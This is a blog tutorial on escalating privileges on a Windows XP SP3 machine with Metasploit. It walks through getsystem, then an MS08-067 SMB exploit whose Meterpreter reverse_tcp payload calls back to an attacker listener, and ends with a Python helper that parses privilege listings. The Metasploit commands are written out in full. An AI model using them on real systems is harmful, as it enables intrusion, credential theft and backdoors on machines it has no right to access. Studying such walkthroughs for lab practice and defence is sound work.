Privilege Escalation in windows xp using metasploit
03 Jan


In the last post I explained how to get administrator privileges on Windows 7 after a successful compromise. Compared to that, it is even easier on Windows XP.

The screenshot below was taken after I successfully gained access using a payload I created myself. To build your own payload, see my previous post on creating a payload as an executable.

Screenshot from 2014-06-19 08:45:58

Once the victim executes the payload, I get access to their system through a listener started with the multi/handler module, which lets Metasploit wait for the reverse shell connection.

Screenshot from 2014-06-19 08:23:26

meterpreter > getuid

The getuid output shows that we are running as the user who is currently logged in to the system, not as the SYSTEM account. How do we escalate our privileges to SYSTEM?

The session only has limited user rights. This severely limits what you can do on the remote system: dumping password hashes, manipulating the registry, installing backdoors, and so on.

Fortunately, Meterpreter has a command, 'getsystem', that tries a number of different techniques to gain SYSTEM-level privileges on the remote system. There are also various local exploits that can be used to escalate privileges.

meterpreter > load priv

meterpreter > getsystem

To use the 'getsystem' command, the 'priv' extension must be loaded; if it is not loaded already, load it first ('use priv' is the older spelling of the same command).

We let Metasploit do the heavy lifting by running getsystem without any options. The command attempts every technique available to it, stopping at the first one that succeeds.

There are situations where getsystem fails, depending on the operating system, its patch level, and the rights of the account the session is running as.

For this tutorial the victim machine is Windows XP SP3; running the sysinfo command in your Meterpreter shell shows information about the target system.

meterpreter > sysinfo

Here getsystem fails: the logged-in user is a limited account, and getsystem's techniques (named-pipe impersonation and token duplication) rely on privileges such as SeImpersonatePrivilege and SeDebugPrivilege that only an administrator's token carries. XP has no UAC, so a session running as a local administrator usually gets SYSTEM from getsystem directly; a limited user does not.
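The following is an added example, not code from the original post or from Metasploit. It parses the kind of privilege table that getprivs or post/windows/gather/win_privs prints for a session, predicts whether getsystem has a technique left to try, and checks a getuid line for NT AUTHORITY\SYSTEM after escalation. The two sample listings are constructed, and the mapping from privileges to getsystem techniques is a simplified heuristic of my own (SeImpersonatePrivilege for named-pipe impersonation, SeDebugPrivilege as a stand-in for "administrator-like" rights), not Metasploit's internal logic.

```python
import re

# Added example (not from the original post): predict from a session's
# privilege listing whether Meterpreter's getsystem has a technique to try,
# and check a getuid line for NT AUTHORITY\SYSTEM after escalation.

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"
PRIV_RE = re.compile(r"\bSe[A-Za-z]+Privilege\b")

# Constructed sample listings, modelled on the table that `getprivs` /
# post/windows/gather/win_privs prints. Not captured from a real session.
LIMITED_USER_PRIVS = """\
Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege
"""

SYSTEM_PRIVS = """\
Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeChangeNotifyPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeTcbPrivilege
"""


def parse_privs(listing):
    """Return the set of Se*Privilege names found in a privilege listing."""
    return set(PRIV_RE.findall(listing))


def is_system(getuid_line):
    """True if a `getuid` output line reports NT AUTHORITY\\SYSTEM."""
    user = getuid_line.split(":", 1)[-1].strip()
    return user.upper() == SYSTEM_USER.upper()


def getsystem_prospects(privs):
    """Heuristic (an assumption, not Metasploit's own logic): which getsystem
    technique families the token's privileges leave open.

    - Named-pipe impersonation needs SeImpersonatePrivilege, and the helper
      it launches to connect to the pipe needs administrator-level rights,
      approximated here by SeDebugPrivilege (held by administrators and
      SYSTEM, never by a limited user).
    - Token duplication opens a SYSTEM process, which needs SeDebugPrivilege.
    """
    impersonate = "SeImpersonatePrivilege" in privs
    admin_like = "SeDebugPrivilege" in privs
    return {
        "named_pipe_impersonation": impersonate and admin_like,
        "token_duplication": admin_like,
    }


def explain(getuid_line, listing):
    """One-line verdict for a session described by its getuid line and privilege list."""
    if is_system(getuid_line):
        return "already SYSTEM; getsystem not needed"
    prospects = getsystem_prospects(parse_privs(listing))
    viable = [name for name, ok in prospects.items() if ok]
    if not viable:
        return ("getsystem will likely fail: token lacks the needed privileges; "
                "use a local or remote exploit instead")
    return "getsystem may succeed via: " + ", ".join(viable)


if __name__ == "__main__":
    # Hypothetical hostname XP-VICTIM; the limited user is the case from the post.
    print(explain("Server username: XP-VICTIM\\user", LIMITED_USER_PRIVS))
    print(explain("Server username: NT AUTHORITY\\SYSTEM", SYSTEM_PRIVS))
```

Paste the output of getprivs into the listing argument and the script tells you up front whether getsystem is worth trying or whether, as on this XP SP3 target, you need another exploit.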

So instead we background the session and attack the target with a different exploit. I used exploit/windows/smb/ms08_067_netapi, a remote exploit against the SMB service (MS08-067). Note that it does not reuse the backgrounded session: it attacks the service on RHOST directly, and because that service runs as SYSTEM, the new Meterpreter session it returns already runs as SYSTEM, so no getsystem call is needed afterwards.

meterpreter > background

msf > use exploit/windows/smb/ms08_067_netapi

I exploited this machine with the payload I created before, so use the same payload type you used when exploiting the machine the first time.

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.31.20

msf exploit(ms08_067_netapi) > set LPORT 8080

msf exploit(ms08_067_netapi) > set RHOST 192.168.31.3

msf exploit(ms08_067_netapi) > exploit

(The module has no SESSION option; that option belongs to local exploits that run through an existing session, so there is nothing to set here for the backgrounded session.)

Screenshot from 2014-06-19 08:24:36

The screenshot above shows the new session running as the SYSTEM account, with far more privileges than before. Running post/windows/gather/win_privs lists the privileges held by the session's current token.

meterpreter > run post/windows/gather/win_privs

Screenshot from 2014-06-19 08:26:22
